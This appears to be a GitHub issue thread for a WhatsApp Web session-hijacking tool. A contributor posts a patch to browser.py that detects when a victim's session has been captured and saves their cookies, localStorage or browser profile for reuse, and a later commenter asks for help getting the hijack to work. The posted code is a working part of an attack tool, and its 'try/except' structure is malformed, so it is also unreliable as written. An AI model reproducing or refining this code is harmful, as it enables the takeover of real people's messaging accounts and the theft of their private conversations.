If user has no profile picture the change_identifier is different and wouldn't work [Made temp fix]

[danieldev-gh]

when the hijacked user's profile picture is the default, its not an img element and the xPath is different
its this:
/html/body/div[1]/div/div[2]/div[3]/header/div[1]/div/div/span
instead of this
/html/body/div[1]/div/div/div[4]/header/div[1]/div/img

I made a temporary fix in browser.py

try: 
    identifier = controller.find_element(By.XPATH, change_identifier)
    if identifier:
        # If the identifier is found the attack has 
        # been successful
        print()
        status(f"Got session on {module_name} module")
        if session_type.lower() == "localstorage":
            self.save_localstorage(module_name)
        elif session_type.lower() == "cookies":
            self.save_cookie(module_name)
        else:
            self.save_profile(module_name)
    
        if Settings.verbose:
            status("Resetting browser cookies and localStorage to start over..")
        
        if not session_type.lower() == "profile":
            controller.delete_all_cookies()
            controller.execute_script("window.localStorage.clear()")
            controller.refresh()
            if Settings.verbose:
                status("Session reset successfully")
            time.sleep(5)
        else:
             # Identifier found! Can now close the
             # session and stop listening
            self.close_job(module_name)
            self.close_all()
    else:
        time.sleep(5)
    except:
    # Identifier not found: wait end continue listening
    try:
        identifier2 = controller.find_element(By.XPATH, "/html/body/div[1]/div/div[2]/div[3]/header/div[1]/div/div/span")
        if identifier2:
            # If the identifier is found the attack has 
            # been successful
            print()
            status(f"Got session on {module_name} module")
            if session_type.lower() == "localstorage":
                self.save_localstorage(module_name)
            elif session_type.lower() == "cookies":
                self.save_cookie(module_name)
            else:
                self.save_profile(module_name)
    
            if Settings.verbose:
                status("Resetting browser cookies and localStorage to start over..")
            
            if not session_type.lower() == "profile":
                controller.delete_all_cookies()
                controller.execute_script("window.localStorage.clear()")
                controller.refresh()
                if Settings.verbose:
                    status("Session reset successfully")
                time.sleep(5)
            else:
                # Identifier found! Can now close the
                # session and stop listening
                self.close_job(module_name)
                self.close_all()
        else:
            time.sleep(5)
    except:
        time.sleep(5)

I had the same issue as #206

[dr1408]

Sir I tried to hack my whatsapp I'm using a profile pic + I didn't do your edit yet still no session captured?

[dr1408]

Sir i need your help can i contact you